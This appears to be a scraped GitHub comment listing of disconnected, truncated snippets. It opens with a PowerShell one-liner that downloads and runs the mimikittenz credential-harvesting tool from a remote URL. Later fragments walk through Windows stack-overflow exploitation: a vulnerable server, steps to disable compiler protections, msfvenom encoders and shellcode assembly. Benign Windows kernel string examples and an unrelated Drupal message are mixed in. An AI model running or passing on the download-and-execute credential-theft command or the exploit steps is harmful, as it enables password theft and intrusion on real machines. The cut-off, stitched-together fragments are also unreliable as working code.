nixawk

Results 38 comments of nixawk

@gearcapitan

```
PS C:\Users\test> IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1")
PS C:\Users\test> Invoke-mimikittenz
```

or

```
PS C:\Users\test\Desktop> . .\Invoke-mimikittenz.ps1 # double dots
PS C:\Users\test\Desktop> Invoke-mimikittenz
```

## Stack

### demo1

```
#include "stdafx.h"
#include

int ShowStackLayout(int x, int y)
{
    int z;
    z = x + y;
    return z;
}

int main(int argc, char *argv[])
{...
```

## StackOverflow Exploitation

- vulnerable server
- https://github.com/nixawk/pattern

```
// For StackOverflow Exploitation
#include "stdafx.h"
#include
#include
#include
#include

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR...
```

- Disable: GS
- Disable: /DYNAMICBASE
- Disable: /NXCOMPAT

```
#include "stdafx.h"
#include
#include

/*
$ ./msfvenom -l encoders

Framework Encoders
==================

    Name      Rank  Description
    ----      ----  -----------
    cmd/echo  good...
```

## How to create your own shellcode ?

### Compile shellcode

```
C:\Users\debug\AppData\Local\bin\NASM>nasm shellcode.asm -o shellcode.bin
```

```
[BITS 32]

;[get kernel32 address]
xor ebx, ebx ;clear ebx
mov ebx,...
```

## RtlInitEmptyUnicodeString && RtlCopyUnicodeString

```
UNICODE_STRING src = RTL_CONSTANT_STRING(L"SOURCE STRING");
UNICODE_STRING dst;
WCHAR dst_buf[256]; // Holds 256 WCHARs (512 bytes).

// The third argument is the buffer size in bytes, not in characters.
RtlInitEmptyUnicodeString(&dst, dst_buf, 256 * sizeof(WCHAR));
RtlCopyUnicodeString(&dst, &src);
```

## References

1. ...

## RtlAppendUnicodeToString

```
UNICODE_STRING src = RTL_CONSTANT_STRING(L"SOURCE STRING");
UNICODE_STRING dst;
WCHAR dst_buf[256]; // Holds 256 WCHARs (512 bytes).
NTSTATUS ntstatus;

// The third argument is the buffer size in bytes, not in characters.
RtlInitEmptyUnicodeString(&dst, dst_buf, 256 * sizeof(WCHAR));
RtlCopyUnicodeString(&dst, &src);
ntstatus = RtlAppendUnicodeToString(&dst, L"APPEND...
```

```
kd> vertarget
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Built by: 2600.xpsp.080413-2111
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x80553fc0
Debug session time:...
```

> Clean URLs Disabled Your server is capable of using clean URLs, but it is not enabled. Using clean URLs gives an improved user experience and is recommended. Enable clean...